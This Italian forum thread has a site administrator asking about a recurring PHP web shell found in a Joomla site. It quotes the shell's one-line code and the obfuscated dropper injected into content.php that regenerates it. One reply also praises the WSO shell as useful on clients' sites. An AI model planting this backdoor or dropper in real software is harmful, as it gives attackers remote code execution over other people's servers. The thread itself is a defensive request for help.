strano file nella root del sito

[giusebos]

nel root di uno dei siti che gestisco ho trovato un file:
com_contact_info.php

con al suo interno

Codice: [Seleziona]

<?php ($_=@$_GET[c]).@$_($_POST["5f3avg"])?>
per adesso l'ho cancellato un paio di volte, poi però dopo qualche giorno il file si ripresenta

facendo una ricerca non riesco a trovare nessuna informazione. Avete qualche idea di cosa possa fare quella stringa?

[MariaElenaBoschi]

può fare qualunque cosa, dipende da che valore dai alle due variabili che recuperi una dal get e una dal post.

se lo cancelli e si rigenera qualcosa non va, hai qualche script che fai partire quando accedi

[giusebos]

proprio adesso mi sono accorto che va a recuperare in components/com_content/content.php questa stringa che è stata aggiunta all'inizio

Codice: [Seleziona]

$content = '<?php (';$content .= '$_=';$content .= '@$_G';$content .= 'ET[c]).@$_($_P';$content .= 'OS';$content .= 'T["5f3avg"])?>';$file = @fopen("/var/www/vhosts/vpsxxxxxx.ovh.net/pippo.it/components/com_contact/views/category/com_contact_info.php", "w");@fwrite($file,  $content) ;

[MariaElenaBoschi]

fai una ricerca nei files della stringa "wso"... solitamente è la shell che usano per joomla.
Molto carina e utile per un sacco di lavori, protetta da keyword così la si può usare con buona sicurezza anche su siti di clienti.
Aveva fatto un articolo esplicativo Pasotti aka elpaso

[giusebos]

non ho trovato nessuna occorrenza wso fra le stringhe dei files, dai log viene fuori che è falito l'accesso a
components/com_content/content.php.
ip apparentemente di provenienza Ceca